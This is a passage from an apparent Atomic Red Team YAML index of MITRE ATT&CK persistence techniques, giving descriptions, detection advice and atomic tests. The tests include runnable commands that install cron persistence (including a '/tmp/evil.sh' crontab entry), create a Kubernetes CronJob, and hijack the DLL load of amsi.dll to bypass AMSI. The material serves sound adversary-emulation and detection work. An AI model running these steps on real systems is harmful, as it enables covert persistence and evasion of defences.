(2019, October 8). About admin roles. Retrieved October 18, 2019. + - source_name: Microsoft Support O365 Add Another Admin, October 2019 + url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d + description: Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019. + - source_name: AWS Create IAM User + url: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html + description: AWS. (n.d.). Creating an IAM User in Your AWS Account. Retrieved + January 29, 2020. + - source_name: GCP Create Cloud Identity Users + url: https://support.google.com/cloudidentity/answer/7332836?hl=en&ref_topic=7558554 + description: Google. (n.d.). Create Cloud Identity user accounts. Retrieved + January 29, 2020. + - source_name: Microsoft Azure AD Users + url: https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-directory + description: Microsoft. (2019, November 11). Add or delete users using Azure + Active Directory. Retrieved January 30, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Cloud Account + description: |- + Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users) + + Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection. + id: attack-pattern--a009cb25-4801-4116-9105-80a91cf15c1b + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-03-16T12:47:00.192Z' + created: '2020-01-29T17:32:30.711Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: Collect usage logs from cloud user and administrator accounts + to identify unusual activity in the creation of new accounts and assignment + of roles to those accounts. Monitor for accounts assigned to admin roles that + go over a certain threshold of known admins. + x_mitre_data_sources: + - 'User Account: User Account Creation' + x_mitre_contributors: + - Praetorian + - Microsoft Threat Intelligence Center (MSTIC) + x_mitre_platforms: + - Azure AD + - Office 365 + - IaaS + - Google Workspace + atomic_tests: [] + T1078.004: + technique: + id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65 + description: |- + Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) + + Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. + name: Cloud Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1078.004 + url: https://attack.mitre.org/techniques/T1078/004 + - source_name: AWS Identity Federation + url: https://aws.amazon.com/identity/federation/ + description: Amazon. (n.d.). Identity Federation in AWS. Retrieved March 13, + 2020. + - source_name: Google Federating GC + url: https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction + description: Google. (n.d.). Federating Google Cloud with Active Directory. + Retrieved March 13, 2020. + - source_name: Microsoft Deploying AD Federation + url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs + description: Microsoft. (n.d.). Deploying Active Directory Federation Services + in Azure. Retrieved March 13, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2021-03-16T12:45:15.399Z' + created: '2020-03-13T20:36:57.378Z' + x_mitre_platforms: + - Azure AD + - Office 365 + - SaaS + - IaaS + - Google Workspace + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal + or malicious behavior, such as accessing information outside of the normal + function of the account or account usage at atypical hours. + x_mitre_permissions_required: + - User + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.2' + atomic_tests: [] + T1542.002: + technique: + created: '2019-12-19T20:21:21.669Z' + modified: '2020-03-23T23:48:33.904Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--791481f8-e96a-41be-b089-a088763083d4 + description: |- + Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking. + + Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks. + name: Component Firmware + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1542.002 + url: https://attack.mitre.org/techniques/T1542/002 + - description: SanDisk. (n.d.). Self-Monitoring, Analysis and Reporting Technology + (S.M.A.R.T.). Retrieved October 2, 2018. + source_name: SanDisk SMART + - url: https://www.smartmontools.org/ + description: smartmontools. (n.d.). smartmontools. Retrieved October 2, 2018. + source_name: SmartMontools + - url: https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html + description: Pinola, M. (2014, December 14). 3 tools to check your hard drive's + health and make sure it's not already dying on you. Retrieved October 2, + 2018. + source_name: ITWorld Hard Disk Health Dec 2014 + x_mitre_platforms: + - Windows + x_mitre_data_sources: + - 'Driver: Driver Metadata' + - 'Firmware: Firmware Modification' + - 'Process: OS API Execution' + x_mitre_detection: |- + Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms. + + Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images. + x_mitre_defense_bypassed: + - Anti-virus + - Host intrusion prevention systems + - File monitoring + x_mitre_permissions_required: + - SYSTEM + x_mitre_system_requirements: + - Ability to update component device firmware from the host operating system. + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] + T1546.015: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.015 + url: https://attack.mitre.org/techniques/T1546/015 + - url: https://msdn.microsoft.com/library/ms694363.aspx + description: Microsoft. (n.d.). The Component Object Model. Retrieved August + 18, 2016. + source_name: Microsoft Component Object Model + - url: https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence + description: 'G DATA. (2014, October). COM Object hijacking: the discreet + way of persistence. Retrieved August 13, 2016.' + source_name: GDATA COM Hijacking + - source_name: Elastic COM Hijacking + description: 'Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting + Persistence & Evasion with the COM. Retrieved September 15, 2016.' + url: https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Component Object Model Hijacking + description: "Adversaries may establish persistence by executing malicious content + triggered by hijacked references to Component Object Model (COM) objects. + COM is a system within Windows to enable interaction between software components + through the operating system.(Citation: Microsoft Component Object Model) + \ References to various COM objects are stored in the Registry. \n\nAdversaries + can use the COM system to insert malicious code that can be executed in place + of legitimate software through hijacking the COM references and relationships + as a means for persistence. Hijacking a COM object requires a change in the + Registry to replace a reference to a legitimate system component which may + cause that component to not work when executed. When that system component + is executed through normal system operation the adversary's code will be executed + instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects + that are used frequently enough to maintain a consistent level of persistence, + but are unlikely to break noticeable functionality within the system as to + avoid system instability that could lead to detection. " + id: attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-11-10T18:19:44.750Z' + created: '2020-03-16T14:12:47.923Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: "There are opportunities to detect COM hijacking by searching + for Registry references that have been replaced and through Registry operations + (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary + paths with unknown paths or otherwise malicious content. Even though some + third-party applications define user COM objects, the presence of objects + within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and + should be investigated since user objects will be loaded prior to machine + objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\.(Citation: Elastic + COM Hijacking) Registry entries for existing COM objects may change infrequently. + When an entry with a known good path and binary is replaced or changed to + an unusual value to point to an unknown binary in a new location, then it + may indicate suspicious behavior and should be investigated. \n\nLikewise, + if software DLL loads are collected and analyzed, any unusual DLL load that + can be correlated with a COM object Registry modification may indicate COM + hijacking has been performed. " + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Module: Module Load' + x_mitre_contributors: + - Elastic + x_mitre_platforms: + - Windows + atomic_tests: [] + T1554: + technique: + created: '2020-02-11T18:18:34.279Z' + modified: '2020-03-27T14:49:58.249Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1554 + url: https://attack.mitre.org/techniques/T1554 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Compromise Client Software Binary + description: |- + Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers. + + Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host. + id: attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5 + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_detection: "Collect and analyze signing certificate metadata and check + signature validity on software that executes within the environment. Look + for changes to client software that do not correlate with known software or + patch cycles. \n\nConsider monitoring for anomalous behavior from client applications, + such as atypical module loads, file reads/writes, or network connections." + x_mitre_data_sources: + - 'File: File Modification' + - 'File: File Creation' + - 'File: File Deletion' + - 'File: File Metadata' + x_mitre_contributors: + - CrowdStrike Falcon OverWatch + atomic_tests: [] + T1053.007: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.007 + url: https://attack.mitre.org/techniques/T1053/007 + - source_name: Kubernetes Jobs + url: https://kubernetes.io/docs/concepts/workloads/controllers/job/ + description: The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March + 30, 2021. + - source_name: Kubernetes CronJob + url: https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/ + description: The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved + March 29, 2021. + - source_name: Threat Matrix for Kubernetes + url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + description: Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved + March 30, 2021. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Container Orchestration Job + description: |- + Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster. + + In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in the cluster.(Citation: Threat Matrix for Kubernetes) + id: attack-pattern--1126cab1-c700-412f-a510-61f4937bb096 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-12T18:09:46.821Z' + created: '2021-03-29T17:06:22.247Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: 'Monitor for the anomalous creation of scheduled jobs in + container orchestration environments. Use logging agents on Kubernetes nodes + and retrieve logs from sidecar proxies for application and resource pods to + monitor malicious container orchestration job deployments. ' + x_mitre_contributors: + - Center for Threat-Informed Defense (CTID) + - Vishwas Manral, McAfee + - Yossi Weizman, Azure Defender Research Team + x_mitre_platforms: + - Containers + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Container: Container Creation' + - 'File: File Creation' + identifier: T1053.007 + atomic_tests: + - name: ListCronjobs + auto_generated_guid: ddfb0bc1-3c3f-47e9-a298-550ecfefacbd + description: 'Kubernetes Job is a controller that creates one or more pods and + ensures that a specified number of them successfully terminate. Kubernetes + Job can be used to run containers that perform finite tasks for batch jobs. + Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes + CronJob for scheduling execution of malicious code that would run as a container + in the cluster. + +' + supported_platforms: + - linux + - macos + input_arguments: + namespace: + description: K8s namespace to list + type: String + default: default + executor: + prereq_command: 'which kubectl + +' + command: 'kubectl get cronjobs -n #{namespace} + +' + name: bash + elevation_required: false + - name: CreateCronjob + auto_generated_guid: f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 + description: 'Kubernetes Job is a controller that creates one or more pods and + ensures that a specified number of them successfully terminate. Kubernetes + Job can be used to run containers that perform finite tasks for batch jobs. + Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes + CronJob for scheduling execution of malicious code that would run as a container + in the cluster. + +' + supported_platforms: + - linux + - macos + input_arguments: + namespace: + description: K8s namespace to list + type: String + default: default + executor: + prereq_command: 'which kubectl + +' + command: 'kubectl create -f src/cronjob.yaml -n #{namespace} + +' + cleanup_command: 'kubectl delete cronjob art -n #{namespace} + +' + name: bash + elevation_required: false + T1136: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1136 + url: https://attack.mitre.org/techniques/T1136 + - source_name: Microsoft User Creation Event + description: 'Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account + was created. Retrieved June 30, 2017.' + url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720 + description: |- + Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. + + Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection. + name: Create Account + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-03-16T12:47:00.458Z' + created: '2017-12-14T16:46:06.044Z' + x_mitre_is_subtechnique: false + x_mitre_contributors: + - Microsoft Threat Intelligence Center (MSTIC) + - Praetorian + x_mitre_version: '2.2' + x_mitre_data_sources: + - 'User Account: User Account Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: |- + Monitor for processes and command-line parameters associated with account creation, such as net user or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary. + + Collect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. + x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - IaaS + - Linux + - macOS + - Google Workspace + x_mitre_permissions_required: + - Administrator + atomic_tests: [] + T1543: + technique: + external_references: + - source_name: mitre-attack + external_id: T1543 + url: https://attack.mitre.org/techniques/T1543 + - url: https://technet.microsoft.com/en-us/library/cc772408.aspx + description: Microsoft. (n.d.). Services. Retrieved June 7, 2016. + source_name: TechNet Services + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html + description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved + July 10, 2017. + source_name: AppleDocs Launch Agent Daemons + - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf + description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical + OS X Malware Detection & Analysis. Retrieved July 10, 2017.' + source_name: OSX Malware Detection + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Create or Modify System Process + description: "Adversaries may create or modify system-level processes to repeatedly + execute malicious payloads as part of persistence. When operating systems + boot up, they can start processes that perform background system functions. + On Windows and Linux, these system processes are referred to as services. + (Citation: TechNet Services) On macOS, launchd processes known as [Launch + Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) + are run to finish system initialization and load user specific parameters.(Citation: + AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, + daemons, or agents that can be configured to execute at startup or a repeatable + interval in order to establish persistence. Similarly, adversaries may modify + existing services, daemons, or agents to achieve the same effect. \n\nServices, + daemons, or agents may be created with administrator privileges but executed + under root/SYSTEM privileges. Adversaries may leverage this functionality + to create or modify system processes in order to escalate privileges. (Citation: + OSX Malware Detection). " + id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-09T13:46:29.922Z' + created: '2020-01-10T16:03:18.865Z' + x_mitre_data_sources: + - 'Service: Service Creation' + - 'Service: Service Modification' + - 'Process: Process Creation' + - 'Process: OS API Execution' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_detection: "Monitor for changes to system processes that do not correlate + with known software, patch cycles, etc., including by comparing results against + a trusted system baseline. New, benign system processes may be created during + installation of new software. Data and events should not be viewed in isolation, + but as part of a chain of behavior that could lead to other activities, such + as network connections made for Command and Control, learning details about + the environment through Discovery, and Lateral Movement. \n\nCommand-line + invocation of tools capable of modifying services may be unusual, depending + on how systems are typically used in a particular environment. Look for abnormal + process call trees from known services and for execution of other commands + that could relate to Discovery or other adversary techniques. \n\nMonitor + for changes to files associated with system-level processes." + x_mitre_platforms: + - Windows + - macOS + - Linux + atomic_tests: [] + T1053.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.003 + url: https://attack.mitre.org/techniques/T1053/003 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Cron + description: |- + Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code. The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths. + + An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. cron can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account. + id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-23T23:30:46.546Z' + created: '2019-12-03T14:25:00.538Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_remote_support: false + x_mitre_permissions_required: + - User + x_mitre_detection: "Monitor scheduled task creation from common utilities using + command-line invocation. Legitimate scheduled tasks may be created during + installation of new software or through system administration functions. Look + for changes to tasks that do not correlate with known software, patch cycles, + etc. \n\nSuspicious program execution through scheduled tasks may show up + as outlier processes that have not been seen before when compared against + historical data. Data and events should not be viewed in isolation, but as + part of a chain of behavior that could lead to other activities, such as network + connections made for Command and Control, learning details about the environment + through Discovery, and Lateral Movement. " + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_platforms: + - Linux + - macOS + identifier: T1053.003 + atomic_tests: + - name: Cron - Replace crontab with referenced file + auto_generated_guid: 435057fb-74b1-410e-9403-d81baf194f75 + description: 'This test replaces the current user''s crontab file with the contents + of the referenced file. This technique was used by numerous IoT automated + exploitation attacks. + +' + supported_platforms: + - macos + - linux + input_arguments: + command: + description: Command to execute + type: string + default: "/tmp/evil.sh" + tmp_cron: + description: Temporary reference file to hold evil cron schedule + type: path + default: "/tmp/persistevil" + executor: + name: bash + command: | + crontab -l > /tmp/notevil + echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} + cleanup_command: 'crontab /tmp/notevil + +' + - name: Cron - Add script to all cron subfolders + auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 + description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, + /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a + schedule. This technique was used by the threat actor Rocke during the exploitation + of Linux web servers. + +' + supported_platforms: + - macos + - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in cron folder + type: string + default: persistevil + executor: + elevation_required: true + name: bash + command: | + echo "#{command}" > /etc/cron.daily/#{cron_script_name} + echo "#{command}" > /etc/cron.hourly/#{cron_script_name} + echo "#{command}" > /etc/cron.monthly/#{cron_script_name} + echo "#{command}" > /etc/cron.weekly/#{cron_script_name} + cleanup_command: | + rm /etc/cron.daily/#{cron_script_name} + rm /etc/cron.hourly/#{cron_script_name} + rm /etc/cron.monthly/#{cron_script_name} + rm /etc/cron.weekly/#{cron_script_name} + - name: Cron - Add script to /var/spool/cron/crontabs/ folder + auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 + description: 'This test adds a script to a /var/spool/cron/crontabs folder configured + to execute on a schedule. This technique was used by the threat actor Rocke + during the exploitation of Linux web servers. + +' + supported_platforms: + - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in /var/spool/cron/crontabs folder + type: string + default: persistevil + executor: + elevation_required: true + name: bash + command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} + +' + cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} + +' + T1574.001: + technique: + id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 + description: |- + Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. + + There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) + + Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking) + + If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace. + name: DLL Search Order Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.001 + url: https://attack.mitre.org/techniques/T1574/001 + - external_id: CAPEC-471 + source_name: capec + url: https://capec.mitre.org/data/definitions/471.html + - source_name: Microsoft Dynamic Link Library Search Order + url: https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN + description: Microsoft. (2018, May 31). Dynamic-Link Library Search Order. + Retrieved November 30, 2014. + - source_name: FireEye Hijacking July 2010 + url: https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html + description: Harbour, N. (2010, July 15). Malware Persistence without the + Windows Registry. Retrieved November 17, 2020. + - source_name: OWASP Binary Planting + description: OWASP. (2013, January 30). Binary planting. Retrieved June 7, + 2016. + url: https://www.owasp.org/index.php/Binary_planting + - source_name: FireEye fxsst June 2011 + url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html + description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November + 17, 2020. + - source_name: Microsoft Security Advisory 2269637 + url: https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637 + description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved + March 13, 2020. + - source_name: Microsoft Dynamic-Link Library Redirection + url: https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN + description: Microsoft. (2018, May 31). Dynamic-Link Library Redirection. + Retrieved March 13, 2020. + - source_name: Microsoft Manifests + description: Microsoft. (n.d.). Manifests. Retrieved December 5, 2014. + url: https://msdn.microsoft.com/en-US/library/aa375365 + - source_name: FireEye DLL Search Order Hijacking + url: https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html + description: Nick Harbour. (2010, September 1). DLL Search Order Hijacking + Revisited. Retrieved March 13, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-26T18:37:03.748Z' + created: '2020-03-13T18:11:08.357Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Travis Smith, Tripwire + - Stefan Kanthak + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + x_mitre_detection: Monitor file systems for moving, renaming, replacing, or + modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared + with past behavior) that do not correlate with known software, patches, etc., + are suspicious. Monitor DLLs loaded into a process and detect DLLs that have + the same file name but abnormal paths. Modifications to or creation of `.manifest` + and `.local` redirection files that do not correlate with software updates + are suspicious. + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + identifier: T1574.001 + atomic_tests: + - name: DLL Search Order Hijacking - amsi.dll + auto_generated_guid: 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 + description: | + Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface) + https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ + + Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path. + supported_platforms: + - windows + executor: + command: | + copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe + copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll + %APPDATA%\updater.exe -Command exit + cleanup_command: | + del %APPDATA%\updater.exe >nul 2>&1 + del %APPDATA%\amsi.dll >nul 2>&1 + name: command_prompt + elevation_required: true + T1574.002: + technique: + created: '2020-03-13T19:41:37.908Z' + modified: '2021-04-26T18:31:34.954Z' + kill_chain_phases: + - kill_chain_name: 